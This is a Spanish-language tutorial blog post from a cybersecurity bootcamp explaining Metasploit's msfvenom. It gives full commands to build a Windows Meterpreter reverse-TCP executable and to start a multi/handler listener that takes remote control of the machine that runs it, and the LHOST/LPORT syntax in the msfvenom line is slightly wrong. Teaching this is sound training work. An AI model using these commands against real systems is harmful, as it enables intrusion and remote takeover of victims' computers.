¿Qué es Msfpayload?

Contenido del Bootcamp Dirigido por: | Última modificación: 5 de junio de 2024 | Tiempo de Lectura: 3 minutos

Algunos de nuestros reconocimientos:

Premios KeepCoding

¿Sabes qué es Msfpayload y cómo se utiliza esta herramienta de Metasploit? En este artículo profundizamos en qué es Msfpayload.

¿Qué es Msfpayload?

Msfpayload es una herramienta de Metasploit cuya función es la de generar ejecutables con un payload determinado. El comando para ejecutarlo ha sido modificado y, ya que cuenta con nuevas funciones para evadir sistemas antivirus, ahora es:

// que es msfvenom
msfvenom

Para comenzar a utilizar y aprender qué es Msfpayload o Msfvenom, no es necesario ejecutar la consola de Metasploit. Puedes abrir la herramienta desde una terminal de Kali Linux, usando el comando de arriba.

¿Cómo usar Msfpayload?

Ahora que sabes qué es Msfpayload, te enseñaremos cómo se utiliza en Kali Linux. Antes de eso, es necesario aclarar que el siguiente tutorial está hecho con fines educativos. El propósito de difundir estos conocimientos es entender cómo funciona un ciberataque con el fin de evitarlo.

Con la herramienta msf payload o Msfvenom es posible crear el ejecutable de un payload con un solo comando. Para entenderlo, primero explicaremos cuáles son las variables del mismo.

  • msfvenom: se utiliza para iniciar la herramienta de Metasploit.
  • p: parámetro para definir la ruta del payload. Para nuestro ejemplo, la ruta será «windows/meterpreter/reverse_tcp», esto significa que es un payload de tipo Meterpreter para Windows, con un tipo de conexión inversa a un puerto TCP.
  • LHOST: dirección IP local de tu máquina virtual con Kali Linux. Para este ejemplo, usaremos la IP ficticia 192.168.172.128.
  • LPORT: número de puerto local para que la máquina vulnerada se conecte a la tuya como servidor. Puedes escoger el que quieras. Para este ejemplo, será el 4444.
  • f: parámetro para exportar el payload a un ejecutable.
  • exe: para indicar el tipo de formato del archivo (ejecutable).
  • ejemplo.exe: nombre del archivo.

El código a ejecutar en la terminal de tu máquina virtual con Kali Linux sería:

// msfvenom que es
msfvenom -p windows/meterpreter/reverse_tcp LHOST 192.168.172.128 LPORT 4444 -f exe > ejemplo.exe

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Ya tendrás listo el ejecutable con el payload. Ahora, si lo llevases a otra máquina virtual y lo abrieses de inmediato, ¿qué crees que pasaría? La respuesta correcta es: nada aún, ya que para que funcione tendremos que poner el puerto 4444 a la escucha.

Este proceso lo ejecutaremos desde Metasploit.

Ejecución de código remota

Ahora sabes qué es Msfpayload y cómo crear el archivo ejecutable de un payload con esta herramienta. Sin embargo, falta un paso más para que funcione y, a continuación, te explicaremos cómo hacerlo con Metasploit.

Para poner el puerto a la escucha y tomar control remoto de la máquina por medio del payload, lo primero que haremos será abrir la consola de Metasploit. Para ello, ejecuta el siguiente comando en la terminal de una máquina virtual con Kali Linux:

msfconsole

Para elegir el exploit, es decir, el software que te permitirá ejecutar el payload, ingresa el siguiente comando:

use exploit/multi/handler

Luego, para configurarlo con el payload que usaremos, ingresa:

set payload windows/meterpreter/reverse_tcp

Para configurar las variables LHOST (IP de la máquina virtual de Kali) y LPORT (número de puerto de la máquina de Kali elegido) correctamente, ejecuta estos dos comandos:

set LHOST 192.168.172.128
set LPORT 4444

Finalmente, para ejecutar el payload, utiliza el comando:

run

Con este proceso, al ejecutar el archivo «ejemplo.exe» en un ordenador, obtendrás acceso y control remoto sobre el mismo desde el puerto que hayas elegido con Kali. Meterpreter es un payload muy completo para ejecutar todo tipo de tareas de postexplotación. Para aprender a usarlo, lee nuestro post sobre comandos de Meterpreter.

Si quieres seguir aprendiendo sobre qué es Msfpayload y cómo utilizarlo, en KeepCoding tenemos una formación intensiva que te ayudará a lograr tus objetivos. Con el Ciberseguridad Full Stack Bootcamp te formarás con el acompañamiento de especialistas en la materia y podrás aprender sobre pentesting, criptografía, análisis de malware y mucho más en pocos meses. ¡Pide más información!

Carlos Cilleruelo

CEO and co-founder of Byron Labs & Coordinador del Bootcamp en Ciberseguridad.

Posts más leídos

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado